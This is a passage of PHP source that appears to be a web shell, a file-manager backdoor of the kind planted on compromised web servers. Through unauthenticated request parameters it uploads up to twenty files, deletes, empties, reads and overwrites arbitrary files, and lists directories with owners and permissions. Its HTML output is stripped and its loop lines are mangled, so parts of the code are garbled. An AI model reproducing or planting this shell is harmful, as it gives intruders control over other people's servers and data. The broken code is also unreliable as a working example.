echo "Uploaded to $uploadfile10 ";}
if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile11 ";}
if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile12 ";}
if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile13 ";}
if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile14 ";}
if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile15 ";}
if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile16 ";}
if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile17 ";}
if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile18 ";}
if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile19 ";}
if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile20 ";}
}
echo $copyr;
exit;}
if(@$_GET['yes']=="yes"){
$d=@$_GET['d']; $e=@$_GET['e'];
unlink($d."/".$e);
$delresult="Success $d/$e deleted ";
}
if(@$_GET['clean']=="1"){
@$e=$_GET['e'];
$x=fopen("$d/$e","w");
fwrite($x,"");
echo " ";
exit;
}
if(@$_GET['e']){
$d=@$_GET['d'];
$e=@$_GET['e'];
$pinf=pathinfo($e);
if(in_array(".".@$pinf['extension'],$images)){
echo " ";
exit;}
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$e;
$de=str_replace("//","/",$de);
if(is_file($de)){
if(!is_writable($de)){echo "READ ONLY ";}}
echo "[Delete ] [Edit ] [Filesize to 0 byte ] [Replace text in file ] [Download ] [Rename ] [CHMOD ] [Copy ] ";
echo "
File contents:
$de
";
if(@$_GET['delete']=="1"){
$delete=$_GET['delete'];
echo "
DELETE: Are you sure?
Yes || No
";
if(@$_GET['yes']=="yes"){
@$d=$_GET['d']; @$e=$_GET['e'];
echo $delresult;
}
if(@$_GET['no']){
echo "
";
}
} #end of delete
echo $copyr;
exit;
} #end of e
if(@$_GET['edit']=="1"){
@$d=$_GET['d'];
@$ef=$_GET['ef'];
$e=$ef;
if(is_file($d."/".$ef)){
if(!is_writable($d."/".$ef)){echo "READ ONLY ";}}
echo "[Delete ] [Edit ] [Filesize to 0 byte ] [Replace text in file ] [Download ] [Rename ] [CHMOD ] [Copy ] ";
$filename="$d/$ef";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$ef;
$de=str_replace("//","/",$de);
echo "
Edit:
$de ";
if(!@$_POST['save']){
print "
$c
";
}
if(@$_POST['save']){
$editf=@$_POST['editf'];
if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
$editf=stripslashes($editf);
}
$f=fopen($filename,"w+");
fwrite($f,"$editf");
echo "
File edited.
";
exit;
}
echo $copyr;
exit;
}
echo"
Filename Tools Size Owner/Group Perms
";
$dirs=array();
$files=array();
$dh = @opendir($d) or die("Permission Denied or Folder/Disk does not exist $copyr
");
while (!(($file = readdir($dh)) === false)) {
if ($file=="." || $file=="..") continue;
if (@is_dir("$d/$file")) {
$dirs[]=$file;
}else{
$files[]=$file;
}
sort($dirs);
sort($files);
$fz=@filesize("$d/$file");
}
function perm($perms){
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
for($i=0; $i$dirs[$i]";
$linkd=str_replace("//","/",$linkd);
echo "0 $linkdDIR $owner/$group $info ";
}
for($i=0; $i2 $files[$i] [options] $siz $owner/$group $info ";
}
echo "
";
echo $copyr;
?>